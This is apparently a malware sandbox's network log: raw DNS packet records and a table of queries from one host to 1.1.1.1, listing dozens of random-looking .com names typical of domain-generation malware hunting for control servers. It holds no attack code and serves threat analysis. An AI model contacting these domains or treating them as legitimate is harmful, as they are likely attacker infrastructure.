                                                                                                                                                                                                          Sep 8, 2024 10:54:35.523828983 CEST53617571.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.524676085 CEST5766553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.524898052 CEST53582851.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.525413990 CEST53633651.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.526267052 CEST5345953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.526871920 CEST5556353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.527143002 CEST53591941.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.527165890 CEST5986953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.528367043 CEST5872653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.528670073 CEST53640581.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.529901028 CEST5599353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.530272007 CEST4944853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.530653954 CEST53644011.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.530805111 CEST5528753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.531142950 CEST53640281.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.531155109 CEST53591081.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.531999111 CEST53637111.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.533159971 CEST53615861.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.533365965 CEST53654871.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.534190893 CEST6027253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.534276962 CEST53608851.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.534513950 CEST6511453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.534701109 CEST5508953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.534841061 CEST5714553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.534959078 CEST5744653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.535142899 CEST6501553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.535157919 CEST4944253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.536366940 CEST5924153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.536442041 CEST5327353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.537197113 CEST53555631.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.538096905 CEST53534591.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.538110018 CEST53598691.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.540633917 CEST53587261.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.540761948 CEST53552871.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.541249990 CEST53576651.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.541286945 CEST53576491.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.542247057 CEST53606121.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.545598030 CEST53574461.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.545912981 CEST53571451.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.546195030 CEST53592411.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.546262026 CEST53532731.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.546396971 CEST53651141.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.546844006 CEST53494481.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.550204992 CEST53559931.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.551814079 CEST53494421.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.555684090 CEST53511691.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.564876080 CEST53602721.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.566556931 CEST53527171.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.566654921 CEST53550891.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.566927910 CEST53650151.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.572550058 CEST53598951.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.675026894 CEST53578771.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.336592913 CEST5797253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.336720943 CEST6387053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.337168932 CEST5746753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.337168932 CEST6496153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.337399960 CEST5337253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.337624073 CEST5489553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.337717056 CEST5038153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.337853909 CEST5469553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.338239908 CEST5908153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.338337898 CEST5250153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.346307993 CEST53579721.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.346710920 CEST53503811.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.346733093 CEST53546951.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.346787930 CEST53649611.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.347024918 CEST53548951.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.347687006 CEST53525011.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.347888947 CEST53590811.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.352360964 CEST53638701.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.354501009 CEST53533721.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.354808092 CEST53574671.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.381316900 CEST6192653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.393138885 CEST53619261.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.395673037 CEST5019553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.397833109 CEST5224253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.400548935 CEST6004953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.406789064 CEST53501951.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.407830954 CEST53522421.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.410587072 CEST53600491.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.429168940 CEST6471453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.434072018 CEST5212853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.438687086 CEST53647141.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.443908930 CEST53521281.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.475549936 CEST5116253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.483194113 CEST4929653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.485963106 CEST53511621.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.487935066 CEST5291353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.489280939 CEST5398853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.492825985 CEST5082053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.493757963 CEST53492961.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.496958017 CEST4997453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.497761011 CEST53529131.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.498976946 CEST53539881.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.503925085 CEST53508201.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.506491899 CEST5239453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.507010937 CEST53499741.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.509943008 CEST5839553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.511066914 CEST5688753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.512257099 CEST6055753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.516465902 CEST53523941.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.518569946 CEST6088553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.519172907 CEST5910853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.522741079 CEST5284153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.525201082 CEST53583951.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.526659966 CEST5404253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.527888060 CEST53568871.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.528104067 CEST53608851.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.528109074 CEST5151953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.528492928 CEST53591081.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.528599977 CEST53605571.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.537563086 CEST53540421.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.537590027 CEST53515191.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.539391994 CEST53528411.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.539887905 CEST6120653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.540117979 CEST5404553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.540657043 CEST5997653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.546624899 CEST5885653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.548027039 CEST6316453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.548223972 CEST6298453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.548399925 CEST6525853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.548439980 CEST6063353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.548563004 CEST5944253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.551279068 CEST53540451.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.556535959 CEST53588561.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.557203054 CEST53629841.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.557756901 CEST53612061.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.557990074 CEST5181553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.558073044 CEST5585253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.558141947 CEST53606331.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.558645010 CEST53599761.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.558659077 CEST53652581.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.559452057 CEST6437453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.563307047 CEST53631641.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.565335989 CEST5022453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.567322969 CEST53594421.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.569783926 CEST53643741.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.573093891 CEST6170453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.573479891 CEST6128453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.573714018 CEST6284853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.574079037 CEST6347453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.576103926 CEST6292053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.576924086 CEST53558521.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.578700066 CEST6165453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.584055901 CEST53612841.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.588280916 CEST53616541.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.590027094 CEST53518151.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.590759993 CEST53628481.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.592622995 CEST53629201.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.598552942 CEST53502241.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.604491949 CEST53617041.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.606081009 CEST53634741.1.1.1192.168.2.9
                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.108879089 CEST192.168.2.91.1.1.10xc162Standard query (0)lygygin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.109256983 CEST192.168.2.91.1.1.10x768cStandard query (0)galykes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.110083103 CEST192.168.2.91.1.1.10x82fcStandard query (0)lysynur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.115099907 CEST192.168.2.91.1.1.10xaf54Standard query (0)vonypom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.117528915 CEST192.168.2.91.1.1.10x312eStandard query (0)qekykev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.119657040 CEST192.168.2.91.1.1.10xec14Standard query (0)pupybul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.121788979 CEST192.168.2.91.1.1.10xecd2Standard query (0)ganypih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.128720999 CEST192.168.2.91.1.1.10xb156Standard query (0)vopybyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.129683971 CEST192.168.2.91.1.1.10x809fStandard query (0)lykyjad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.152848005 CEST192.168.2.91.1.1.10xdff3Standard query (0)qetyvep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.153196096 CEST192.168.2.91.1.1.10x639bStandard query (0)vojyjof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.182841063 CEST192.168.2.91.1.1.10xf308Standard query (0)puvytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.184592962 CEST192.168.2.91.1.1.10x10dStandard query (0)gahyhob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.186197042 CEST192.168.2.91.1.1.10x7b99Standard query (0)lyryvex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.188030958 CEST192.168.2.91.1.1.10xde00Standard query (0)vocyruk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.188446999 CEST192.168.2.91.1.1.10xf990Standard query (0)qegyhig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.215481997 CEST192.168.2.91.1.1.10x3563Standard query (0)gatyvyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.215867043 CEST192.168.2.91.1.1.10xd877Standard query (0)lymysan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.217925072 CEST192.168.2.91.1.1.10xee12Standard query (0)gahyqah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.217968941 CEST192.168.2.91.1.1.10x5f46Standard query (0)lyryfyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.225936890 CEST192.168.2.91.1.1.10xee91Standard query (0)vocyzit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.226270914 CEST192.168.2.91.1.1.10x3fbStandard query (0)purydyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.226460934 CEST192.168.2.91.1.1.10x5d22Standard query (0)qegyqaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.427602053 CEST192.168.2.91.1.1.10xeb48Standard query (0)lyvytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.428092003 CEST192.168.2.91.1.1.10x650aStandard query (0)puvyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.452250004 CEST192.168.2.91.1.1.10x3ee2Standard query (0)purycap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.455549002 CEST192.168.2.91.1.1.10x7cbdStandard query (0)gacyryw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.455970049 CEST192.168.2.91.1.1.10xc199Standard query (0)lygymoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.455970049 CEST192.168.2.91.1.1.10xd83fStandard query (0)gacyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.513669014 CEST192.168.2.91.1.1.10x5526Standard query (0)lyvyxor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.513932943 CEST192.168.2.91.1.1.10x5a1bStandard query (0)qekyqop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.514061928 CEST192.168.2.91.1.1.10xf447Standard query (0)qetyfuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.514456987 CEST192.168.2.91.1.1.10x8758Standard query (0)qexyryl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.514765978 CEST192.168.2.91.1.1.10xdb0aStandard query (0)pufygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.514969110 CEST192.168.2.91.1.1.10x7a14Standard query (0)gaqycos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.515242100 CEST192.168.2.91.1.1.10xa69eStandard query (0)gatyfus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.516216040 CEST192.168.2.91.1.1.10xdc3eStandard query (0)vowydef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.516247988 CEST192.168.2.91.1.1.10xda5dStandard query (0)vowycac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.516614914 CEST192.168.2.91.1.1.10x2760Standard query (0)volykyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.516887903 CEST192.168.2.91.1.1.10x73daStandard query (0)pujyjav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.517261028 CEST192.168.2.91.1.1.10xf93bStandard query (0)qebytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.517724037 CEST192.168.2.91.1.1.10x2e8bStandard query (0)gadyniw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.517802954 CEST192.168.2.91.1.1.10x13d6Standard query (0)pumypog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.518204927 CEST192.168.2.91.1.1.10xddc4Standard query (0)puzylyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.518501997 CEST192.168.2.91.1.1.10xe840Standard query (0)vofymik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.519025087 CEST192.168.2.91.1.1.10x2247Standard query (0)lyxylux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.519113064 CEST192.168.2.91.1.1.10xeee1Standard query (0)gaqydeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.519613028 CEST192.168.2.91.1.1.10x859Standard query (0)qedynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.519926071 CEST192.168.2.91.1.1.10x405fStandard query (0)qexylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.520113945 CEST192.168.2.91.1.1.10x22ceStandard query (0)lyxywer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.520618916 CEST192.168.2.91.1.1.10xf3a2Standard query (0)qeqysag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.521822929 CEST192.168.2.91.1.1.10x2da1Standard query (0)vojyqem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.522270918 CEST192.168.2.91.1.1.10x57e2Standard query (0)pufymoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.544584990 CEST192.168.2.91.1.1.10xc1beStandard query (0)lymyxid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.544787884 CEST192.168.2.91.1.1.10xa7caStandard query (0)volyqat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.545425892 CEST192.168.2.91.1.1.10x667bStandard query (0)gadyfuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.546279907 CEST192.168.2.91.1.1.10x150aStandard query (0)qedyfyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.555068970 CEST192.168.2.91.1.1.10x3c7bStandard query (0)galyqaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.557391882 CEST192.168.2.91.1.1.10x307eStandard query (0)lysyfyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.558974028 CEST192.168.2.91.1.1.10x8002Standard query (0)vonyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.568423986 CEST192.168.2.91.1.1.10x6402Standard query (0)pumyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.569097042 CEST192.168.2.91.1.1.10xcf1cStandard query (0)qeqyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.570606947 CEST192.168.2.91.1.1.10x912cStandard query (0)vofygum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.579932928 CEST192.168.2.91.1.1.10x6167Standard query (0)puzywel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.173449039 CEST192.168.2.91.1.1.10xff90Standard query (0)www.gahyqah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.626854897 CEST192.168.2.91.1.1.10xb19cStandard query (0)lykymox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.626921892 CEST192.168.2.91.1.1.10x1552Standard query (0)qebylug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.627098083 CEST192.168.2.91.1.1.10x7bf9Standard query (0)ganyzub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.627549887 CEST192.168.2.91.1.1.10x8b8Standard query (0)pujymip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.632281065 CEST192.168.2.91.1.1.10xa3cdStandard query (0)vopydek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.636965990 CEST192.168.2.91.1.1.10x4694Standard query (0)puvylyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.637690067 CEST192.168.2.91.1.1.10xd3d1Standard query (0)pupydeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.637909889 CEST192.168.2.91.1.1.10xbdcStandard query (0)pupycag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.638516903 CEST192.168.2.91.1.1.10xad92Standard query (0)lykygur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.639735937 CEST192.168.2.91.1.1.10x778dStandard query (0)lyrysor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.640543938 CEST192.168.2.91.1.1.10xcb6dStandard query (0)qebyrev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.641560078 CEST192.168.2.91.1.1.10x4930Standard query (0)gatycoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.643292904 CEST192.168.2.91.1.1.10x7c8eStandard query (0)pufybyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.644346952 CEST192.168.2.91.1.1.10x9ddaStandard query (0)pujygul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.645701885 CEST192.168.2.91.1.1.10x46f1Standard query (0)vowypit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.656855106 CEST192.168.2.91.1.1.10x9126Standard query (0)lymylyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.657042980 CEST192.168.2.91.1.1.10xcc0cStandard query (0)gadydas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.657768011 CEST192.168.2.91.1.1.10x1651Standard query (0)volymum.comA (IP address)IN (0x0001)false
